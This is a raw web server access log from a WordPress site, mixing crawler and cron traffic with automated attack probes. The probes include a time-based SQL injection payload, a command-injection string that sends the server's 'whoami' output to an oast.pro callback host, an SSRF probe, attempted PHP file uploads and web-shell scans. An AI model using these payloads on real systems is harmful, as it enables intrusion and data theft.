185.61.153.107 - - [18/Oct/2025:11:35:24 -0400] "POST /wp-cron.php?doing_wp_cron=1760801724.6728730201721191406250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
41.73.194.134 - - [18/Oct/2025:11:35:22 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; LCTE; rv:11.0) like Gecko"
157.20.32.210 - - [18/Oct/2025:11:37:03 -0400] "POST /controller/ping.php HTTP/1.1" 404 10855 "https://salhab360photos.com/controller/ping.php" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.13"
157.20.32.210 - - [18/Oct/2025:11:37:04 -0400] "POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1" 404 12303 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 108) AppleWebKit/536.15 (KHTML like Gecko) Version/6.0 Safari/536.16"
157.20.32.210 - - [18/Oct/2025:11:37:12 -0400] "POST /js/jquery_file_upload/server/php/ HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0"
98.70.29.56 - - [18/Oct/2025:11:37:52 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
185.61.153.107 - - [18/Oct/2025:11:38:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760801894.1681349277496337890625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:38:08 -0400] "GET /products126446456?kg=0124904509 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:38:24 -0400] "POST /network_test.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
18.130.255.219 - - [18/Oct/2025:11:38:31 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
46.101.70.221 - - [18/Oct/2025:11:38:31 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
202.131.96.220 - - [18/Oct/2025:11:38:54 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASAJS; rv:11.0) like Gecko"
185.61.153.107 - - [18/Oct/2025:11:39:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760801958.3682160377502441406250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
202.131.96.220 - - [18/Oct/2025:11:39:10 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASAJS; rv:11.0) like Gecko"
216.73.216.159 - - [18/Oct/2025:11:39:49 -0400] "GET /products234621894?kg=0231760734 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:40:01 -0400] "GET /products49995190?kg=0049385574 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
138.68.166.157 - - [18/Oct/2025:11:40:24 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
18.130.255.219 - - [18/Oct/2025:11:40:24 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
206.189.247.132 - - [18/Oct/2025:11:40:24 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
66.249.64.107 - - [18/Oct/2025:11:40:34 -0400] "GET /?products3213994?kg=0003174880 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
157.20.32.210 - - [18/Oct/2025:11:40:38 -0400] "POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
20.171.207.254 - - [18/Oct/2025:11:35:48 -0400] "GET /products60906406?kg=0060163726 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:11:36:55 -0400] "POST /wp-cron.php?doing_wp_cron=1760801815.3700499534606933593750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:36:51 -0400] "GET /products60926948?kg=0060184019 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:37:11 -0400] "POST /task/loginValidation.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:37:06 -0400] "POST /configWizard/keyUpload.jsp HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0"
185.61.153.107 - - [18/Oct/2025:11:37:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760801836.8699491024017333984375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
92.222.108.97 - - [18/Oct/2025:11:37:31 -0400] "GET /products51949086?kg=0051315642 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.20.32.210 - - [18/Oct/2025:11:37:46 -0400] "POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:37:52 -0400] "GET /pfblockerng/www/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10"
20.171.207.254 - - [18/Oct/2025:11:37:54 -0400] "GET /products60924938?kg=0060182032 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:38:20 -0400] "GET /products194047128?kg=0191680781 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
164.90.241.135 - - [18/Oct/2025:11:38:31 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
174.138.112.39 - - [18/Oct/2025:11:38:32 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
216.73.216.159 - - [18/Oct/2025:11:38:32 -0400] "GET /products146477010?kg=0144690788 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:38:44 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:11:38:56 -0400] "GET /products60940956?kg=0060197855 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:11:40:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760802015.6681489944458007812500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:39:59 -0400] "GET /products60908010?kg=0060165312 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:41:08 -0400] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:11:41:04 -0400] "GET /products60918506?kg=0060175680 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:41:11 -0400] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1"
216.73.216.159 - - [18/Oct/2025:11:41:28 -0400] "GET /products56835672?kg=0056142637 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:42:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760802135.6668400764465332031250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:42:08 -0400] "GET /index.asp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:11:42:06 -0400] "GET /products60873320?kg=0060131045 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:42:12 -0400] "GET /products59426926?kg=0058702290 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:42:19 -0400] "GET /index.asp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:42:40 -0400] "GET /products239661810?kg=0236739188 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:42:53 -0400] "GET /products198526350?kg=0196105378 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:43:06 -0400] "GET /products199335690?kg=0196904848 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:43:10 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:11:43:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760802196.4718010425567626953125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:43:11 -0400] "GET /products60935434?kg=0060192400 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:43:29 -0400] "GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0"
205.251.153.4 - - [18/Oct/2025:11:43:44 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:43:50 -0400] "GET /products233939654?kg=0231086814 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:11:44:04 -0400] "GET /products6139718?kg=0006064926 HTTP/1.1" 200 29943 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:11:44:03 -0400] "GET /products111855954?kg=0110491940 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:40:51 -0400] "GET /login/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_6; de) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:40:56 -0400] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:41:05 -0400] "GET /products182053566?kg=0179833482 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:41:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760802076.1695640087127685546875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:41:10 -0400] "GET /products181989410?kg=0179770108 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:41:12 -0400] "GET /index.php/user/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:41:19 -0400] "GET /products194071204?kg=0191704563 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:41:34 -0400] "GET /products235616950?kg=0232743654 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:41:40 -0400] "GET /products228355490?kg=0225570748 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:41:46 -0400] "GET /products179047902?kg=0176864474 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:41:59 -0400] "GET /products175146292?kg=0173010443 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:42:32 -0400] "GET /index.asp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:43:12 -0400] "GET /products77545068?kg=0076599479 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:43:22 -0400] "GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:43:25 -0400] "GET /products186520936?kg=0184246373 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:43:37 -0400] "GET /products1522202?kg=0001503720 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:44:02 -0400] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 12359 "-" "Node.js"
185.61.153.107 - - [18/Oct/2025:11:44:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760802258.6724240779876708984375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:44:14 -0400] "GET /products60895910?kg=0060153358 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:44:43 -0400] "GET /products87978902?kg=0086906070 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - admin [18/Oct/2025:11:45:00 -0400] "POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.1"
185.61.153.107 - - [18/Oct/2025:11:45:20 -0400] "POST /wp-cron.php?doing_wp_cron=1760802320.7702090740203857421875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:45:14 -0400] "GET /products60887054?kg=0060144610 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:45:17 -0400] "POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.d3pm34ikdbcl3g7iqchgt1gb7o3rckf9y.oast.pro) HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
66.249.64.105 - - [18/Oct/2025:11:45:58 -0400] "GET /categories/12228242 HTTP/1.1" 200 29494 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
157.20.32.210 - - [18/Oct/2025:11:46:36 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"
157.20.32.210 - - [18/Oct/2025:11:46:52 -0400] "GET /?phonepe_action=curltestPhonePe&url=http://d3pm34ikdbcl3g7iqchgyfoyz85p16dca.oast.pro HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:46:46 -0400] "POST /wp-json/lp/v1/courses/archive-course HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
105.74.12.34 - - [18/Oct/2025:11:46:54 -0400] "GET /ru.php HTTP/1.1" 404 10897 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:11:47:05 -0400] "GET /if.php HTTP/1.1" 404 10903 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
185.61.153.107 - - [18/Oct/2025:11:47:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760802435.5691471099853515625000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:47:16 -0400] "GET /products119123450?kg=0117670808 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
105.74.12.34 - - [18/Oct/2025:11:47:15 -0400] "GET /vuln.php HTTP/1.1" 404 10897 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
20.171.207.254 - - [18/Oct/2025:11:47:21 -0400] "GET /products60899104?kg=0060156513 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:47:36 -0400] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=34EYbXkFXVtf33lyBv2youtUIDW.pHp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.1"
157.20.32.210 - - [18/Oct/2025:11:47:47 -0400] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=34EYbXkFXVtf33lyBv2youtUIDW.pHp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.1"
157.20.32.210 - - [18/Oct/2025:11:48:00 -0400] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=34EYbXkFXVtf33lyBv2youtUIDW.pHp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.1"
157.20.32.210 - - [18/Oct/2025:11:44:07 -0400] "POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:44:11 -0400] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 404 12314 "-" "Report Runner"
216.73.216.159 - - [18/Oct/2025:11:44:17 -0400] "GET /products15758760?kg=0015566661 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:45:21 -0400] "GET /products6755156?kg=0006672859 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:11:45:36 -0400] "GET /?products122702796?kg=0121206503 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:11:45:52 -0400] "GET /products198550786?kg=0196129516 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:46:25 -0400] "POST /wp-cron.php?doing_wp_cron=1760802385.5684609413146972656250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:46:16 -0400] "GET /products60911040?kg=0060168305 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:11:46:24 -0400] "GET /products155058028?kg=0153167159 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:46:35 -0400] "POST /wp-json/lp/v1/courses/archive-course HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
105.74.12.34 - - [18/Oct/2025:11:46:36 -0400] "GET /shell4.php HTTP/1.1" 404 10906 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:11:46:47 -0400] "GET /ups.php HTTP/1.1" 404 10906 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
98.70.29.56 - - [18/Oct/2025:11:47:06 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
157.20.32.210 - - [18/Oct/2025:11:47:08 -0400] "GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:11:47:19 -0400] "GET /wp-admin/users.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:47:30 -0400] "GET /wp-admin/users.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
105.74.12.34 - - [18/Oct/2025:11:47:29 -0400] "GET /fw.php HTTP/1.1" 404 10904 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
